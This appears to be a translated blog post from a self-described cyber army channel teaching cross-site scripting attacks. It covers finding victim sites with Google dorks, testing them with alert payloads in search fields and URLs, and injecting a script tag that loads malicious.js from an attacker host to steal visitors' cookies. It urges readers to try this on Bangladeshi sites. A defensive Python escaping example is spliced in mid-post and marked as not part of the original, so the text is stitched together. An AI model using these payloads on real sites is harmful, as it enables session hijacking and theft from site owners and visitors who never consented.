Rules for hacking websites.


Today I will talk to you about a method of hacking websites called XSS, or cross-site scripting. Note: Neither I nor this group will take responsibility if anyone does bad things through this post; it is just for use in educational work. And don't forget to test on Bangladeshi site.

Step 1: Find vulnerable web sites.

A hacker first finds a vulnerable site. To do that he first goes to Google and uses Google Dorks to find vulnerable sites. He then searches with the query below.

"search?q="

Then you will find many vulnerable sites. Now enter a site.

Step 2: Test for vulnerability.

Now we will check the vulnerability of the site that we have entered. For this you first need to find the ABT post or parameter of the site. Got it? If you don't understand, wait a minute and I will explain. It means you need to find a value that is sent to the site's server, e.g. a search query, username or password.

There are two methods for testing vulnerability.

Method 1: The first method is to inject in the main search box of the site.
A hacker usually writes a malicious script in the main search box of the site, then clicks on the search button. As soon as the search is done, the malicious script starts working on the website.

Method 2: Injection to the site URL.

It does not work in any search box. It only works on site URLs. For example:

http://vulnerablewebsite/search?q=malicious_script_goes_here

For convenience, enter the following code in the input fields.

<script>alert('hi');</script>

Now you can check with the above code. For example:

First method: You search by typing the above code in the main search box of your victim's site.

Method 2: You enter the link to the victim's site. E.g.

http://vulnerablewebsite/search?q=<script>alert('TunerPage');</script>

Now if a pop-up box reading 'TunerPage' appears, you know that this site is vulnerable to XSS.

Step 3: Give Malicious Scripts.

After testing the vulnerability, a hacker's next task is to inject malicious scripts into the victim's site. This helps in stealing cookies and in malware attacks from that site. Now suppose there is a cookie-stealing script on the hacker's site. Then the URL of the malicious script is

http://attackerSite/malicious.js

Now the hacker can inject his malicious script into the vulnerable site. Then the injected code is

<script src=http://attackerSite/malicious.js></script>

Then whenever a visitor visits that site, the malicious script will start working and start stealing cookies. XSS is generally divided into two types according to how long the injected script persists.

One is Persistent and the other is Non-Persistent

Persistent XSS:

This is the most risky XSS vulnerability. Here the data is stored directly on the server. So whenever a malicious script is injected into that site, it is saved permanently in the web application and is shown to all other visitors. If you inject malicious scripts into your victim's web site, it also infects visitors to the site. For example, there are some sites that save search queries to track users on their site. The result is permanently stored XSS.

Non-Persistent XSS:

Many people call it Reflected XSS. Here the malicious script is temporary. As a result, ordinary visitors will not be able to see your script. But hackers use injection tricks to show visitors the script they have injected. Interestingly, regular visitors to the site think that it is the site's own link. As a result, they go there and also become victims of the hack. For example, if you search for anything on some sites, you will see that the search string you entered is shown back to you. This is why the malicious code is temporary here.
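The search-string reflection described above, seen from the defending side, as an added example that is not part of the original post: the same search page is rendered once with the query copied into the HTML unchanged and once with the query HTML-encoded, and a parser counts the script elements a browser would see in each. The function names, the page template and the cookie value are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# The test string from the page, used here as constructed sample input.
SAMPLE_QUERY = "<script>alert('hi');</script>"

# Hypothetical search-results template (assumption, not from the post).
PAGE = "<html><body><h1>Search</h1><p>Results for: {q}</p></body></html>"


def render_unsafe(query):
    """Reflects the query into the HTML unchanged (the vulnerable pattern)."""
    return {"Content-Type": "text/html; charset=utf-8"}, PAGE.format(q=query)


def render_safe(query):
    """Encodes the query for an HTML text context and adds defence-in-depth headers."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        # Disallows inline scripts and scripts loaded from other origins.
        "Content-Security-Policy": "default-src 'self'",
        # HttpOnly keeps the session cookie out of reach of page scripts.
        "Set-Cookie": "session=PLACEHOLDER; HttpOnly; Secure; SameSite=Lax",
    }
    return headers, PAGE.format(q=html.escape(query, quote=True))


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the way an HTML parser tokenises them."""

    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1


def count_script_elements(body):
    """Number of <script> elements present in the rendered body."""
    parser = _ScriptCounter()
    parser.feed(body)
    parser.close()
    return parser.count


if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        _, body = render(SAMPLE_QUERY)
        print(render.__name__, count_script_elements(body), body)
```

The encoded page shows the search string back to the user as text, so the reflection itself is kept while the markup loses its meaning.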

What does a hacker do with this vulnerability?

1 / Stealing identity cards and various confidential information.
2 / Bypassing restriction of the website
3 / Session Hijacking
4 / Malware Attack
5 / Website Defacement
6 / DoS attacks


Hopefully today's post was very helpful, and if you have any questions about this, you can leave them in the comment box. And you must let us know how you like today's post through comments and try to share this post as much as possible.
And stay tuned to Sabuj Bangla TV YouTube channel for such interesting and amazing, real, information technology related information. So many thanks for bothering to read this post to the end. Hope everybody on this site also had a great day. Stay well, stay healthy, stay safe with Sobuz Bangla Cyber Army. Thanks. God bless you.

Green Bangla TV YouTube channel link:

https://www.youtube.com/channel/UCt2TKd4f6oQrzWh-GASXxPw?pbjreload=102
